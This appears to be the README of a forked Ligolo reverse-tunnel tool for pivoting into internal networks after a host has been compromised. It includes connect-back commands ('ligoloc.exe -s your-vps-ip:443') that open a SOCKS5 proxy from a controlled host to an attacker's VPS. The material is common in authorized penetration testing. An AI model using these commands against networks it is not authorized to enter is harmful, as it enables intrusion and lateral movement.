/ligolo

Ligolo : 用于内网渗透的反向隧道

Primary LanguageGoGNU General Public License v3.0GPL-3.0

Ligolo: Reverse tunnel for intranet penetration

forthebadge forthebadge

English | 简体中文

introduce

The project is modified according to ligolo, mainly for some functional tailoring, which is convenient to use.

Ligolo is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS.

Its function is similar to Autoroute + Socks4a in Meterpreter, but it is more stable and faster.

why you need this

When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet.

At this point you want to establish a Socks5 proxy for the other party's intranet.

Ligolo can help you establish an agent to help you continue to penetrate the intranet.

If the controlled host cannot access the Internet, you can try another tool pystinger

Instructions

TL;DR

  • Get the compiled binary file release

  • In your VPS hosting.

./ligolos
  • In the controlled intranet host.
> ligoloc.exe -s your-vps-ip:443
  • After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host.

Detailed description

Ligolo contains two modules:

  • ligolos (server)
  • ligoloc (client)

ligolos runs on your VPS server (attack server).

ligoloc runs on an already controlled intranet host.

ligolos can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy).

ligoloc The server address must be specified when running, using the parameter -s your-vps-ip:443.

You can use the -h parameter to view the help.

Once the connection between ligolos and ligoloc is established, you can use the intranet socks5 proxy of the VPS server 127.0.0.1:1080.

Options

ligolos options:

PS XXX\bin> .\ligolos_windows_amd64.exe -h
Usage of D:\Code\git\go\src\ligolo\bin\ligolos_windows_amd64.exe:
  -cert string
        The TLS server certificate,Unnecessary (default "cert.pem")
  -key string
        The TLS server key,Unnecessary (default "key.pem")
  -l string
        The relay server listening address (the connect-back address) (default "0.0.0.0:443")
  -s5 string
        The local socks5 server address (your proxychains parameter) (default "127.0.0.1:1080")

ligoloc options:

PS XXX\bin> .\ligoloc_windows_amd64.exe -h
Usage of D:\Code\git\go\src\ligolo\bin\ligoloc_windows_amd64.exe:
  -s string
        The relay server (the connect-back address) (default "example.com:443")

Compile

Refer to the compilation method of the original ligolo

Features

  • TLS 1.3 encrypted tunnel
  • Multi-platform (Windows / Linux / Mac /...)
  • Multiple connection multiplexing (1 TCP connection transmits all traffic)
  • SOCKS5 proxy

To Do

  • Better timeout mechanism
  • SOCKS5 UDP support
  • mTLS mutual authentication
  • Reverse port mapping (mapping intranet port to internet)

Licensing

GNU General Public License v3.0 (refer to LICENSING).

Original author

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>